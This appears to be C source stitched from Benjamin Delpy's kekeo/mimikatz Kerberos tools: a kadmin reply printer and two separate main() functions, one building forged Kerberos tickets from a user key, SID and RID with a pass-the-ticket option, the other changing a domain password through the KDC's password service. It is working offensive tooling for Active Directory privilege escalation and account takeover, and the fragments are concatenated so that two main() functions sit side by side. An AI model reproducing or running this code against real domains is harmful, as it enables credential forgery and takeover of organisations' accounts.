void retFromKadmin(_octet1 * data) { WORD code; if(data->length >= 2) { if(code = _byteswap_ushort(*(PWORD) data->value)) kprintf("%s (%u)", kull_m_kadmin_passwd_err_to_string(code), code); else kprintf("OK"); if(data->length > 2) { kprintf(" - {"); kull_m_string_printf_hex(data->value + 2, data->length - 2, 0); kprintf("}"); } printf("\n"); } else PRINT_ERROR("Size\n"); }
int main(int argc, char * argv[]) { EncryptionKey userKey; LPCSTR szUser, szDomain, szTarget, szService, szPassword = NULL, szKey = NULL, szSid, szRid, szKdc = NULL, szFilename = NULL; PSID sid = NULL, domainSid = NULL; DWORD ret, rid = 0; PDOMAIN_CONTROLLER_INFO cInfo = NULL; kprintf("\n" " .#####. " MIMIKATZ_FULL "\n" " .## ^ ##. \n" " ## / \\ ## /* * *\n" " ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n" " '## v ##' http://blog.gentilkiwi.com (oe.eo)\n" " '#####' ... with thanks to Tom Maddock & Sylvain Monne * * */\n\n"); if(init()) { if(!kull_m_string_args_byName(argc, argv, "ptt", NULL, NULL)) kull_m_string_args_byName(argc, argv, "ticket", &szFilename, TICKET_FILENAME); if(kull_m_string_args_byName(argc, argv, "target", &szTarget, NULL)) { if(kull_m_string_args_byName(argc, argv, "service", &szService, NULL)) { if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL)) { if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL)) { if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL)) { if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL)) userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96; else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL)) userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96; else userKey.keytype = KERB_ETYPE_RC4_HMAC_NT; if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey))) { if(!kull_m_string_args_byName(argc, argv, "kdc", &szKdc, NULL)) { ret = DsGetDcName(NULL, szDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo); if(ret == ERROR_SUCCESS) { szKdc = cInfo->DomainControllerName + 2; kprintf("[KDC] \'%s\' will be the main server\n", szKdc); } else PRINT_ERROR("[KDC] DsGetDcName: %u\n", ret); } if(szKdc) { if(kull_m_string_args_byName(argc, argv, "sid", &szSid, NULL) && kull_m_string_args_byName(argc, argv, "rid", &szRid, NULL)) { if(ConvertStringSidToSid(szSid, &sid)) rid = strtoul(szRid, NULL, 0); else PRINT_ERROR_AUTO("ConvertStringSidToSid"); } if(!(sid && rid)) { if(szPassword) { #pragma warning(push) #pragma warning(disable:4996) impersonateToGetData(szUser, szDomain, szPassword, szKdc,&sid, &rid, _pgmptr); #pragma warning(pop) } else PRINT_ERROR("Impersonate is only supported with a password (you need KDC, SID & RID)\n"); } if(sid && rid) { kprintf("\n" "user : %s\n" "domain : %s\n" "password : %s\n" "sid : " , szUser, szDomain, szKey ? "<NULL>" : "***"); kull_m_string_displaySID(sid); kprintf("\n" "target : %s\n" "service : %s\n" "rid : %u\n" "key : " , szTarget, szService, rid); kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0); kprintf(" (%s)\n" "ticket : %s\n" , kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype), szFilename ? szFilename : "** Pass The Ticket **"); if(szKdc) { kprintf("kdc : %s\n\n", szKdc); makeInception(szUser, szDomain, sid, rid, szTarget, szService, &userKey, szKdc, 88, szFilename); } else PRINT_ERROR("No KDC at all\n"); LocalFree(sid); } else PRINT_ERROR("Missing valid SID & RID (argument or auto)\n"); } else PRINT_ERROR("Missing one valid DC (argument or auto)\n"); if(cInfo) NetApiBufferFree(cInfo); LocalFree(userKey.keyvalue.value); } } else PRINT_ERROR("Missing password/key argument\n"); } else PRINT_ERROR("Missing domain argument\n"); } else PRINT_ERROR("Missing user argument\n"); } else PRINT_ERROR("Missing service argument\n"); } else PRINT_ERROR("Missing target argument\n"); } else PRINT_ERROR("init() failed\n"); term(); return 0; }
int main(int argc, char * argv[]) { EncryptionKey userKey; LPCSTR szUser, szDomain, szPassword = NULL, szKey = NULL, szNew; LPSTR szWhatDC; kprintf("\n" " .#####. " MIMIKATZ_FULL "\n" " .## ^ ##. " MIMIKATZ_SECOND "\n" " ## / \\ ## /* * *\n" " ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n" " '## v ##' http://blog.gentilkiwi.com (oe.eo)\n" " '#####' ... with thanks to Aorato / Microsoft ... * * */\n\n"); if(init()) { if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL)) { if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL)) { if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL)) { if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL)) userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96; else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL)) userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96; else userKey.keytype = KERB_ETYPE_RC4_HMAC_NT; if(kull_m_string_args_byName(argc, argv, "new", &szNew, NULL)) { if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey))) { if(kull_m_kerberos_helper_net_getDC(szDomain, DS_KDC_REQUIRED, &szWhatDC)) { kprintf("[KDC] \'%s\' will be the main server\n\n" "user : %s\n" "domain : %s\n" "password : %s\n" "key : " , szWhatDC, szUser, szDomain, szKey ? "<NULL>" : "***"); kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0); kprintf(" (%s)\n", kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype)); makeInception(szUser, szDomain, szNew, &userKey, szWhatDC, 88, 464); LocalFree(szWhatDC); } LocalFree(userKey.keyvalue.value); } } else PRINT_ERROR("Missing new password\n"); } else PRINT_ERROR("Missing password/key argument\n"); } else PRINT_ERROR("Missing domain argument\n"); } else PRINT_ERROR("Missing user argument\n"); } else PRINT_ERROR("init() failed\n"); term(); return 0; }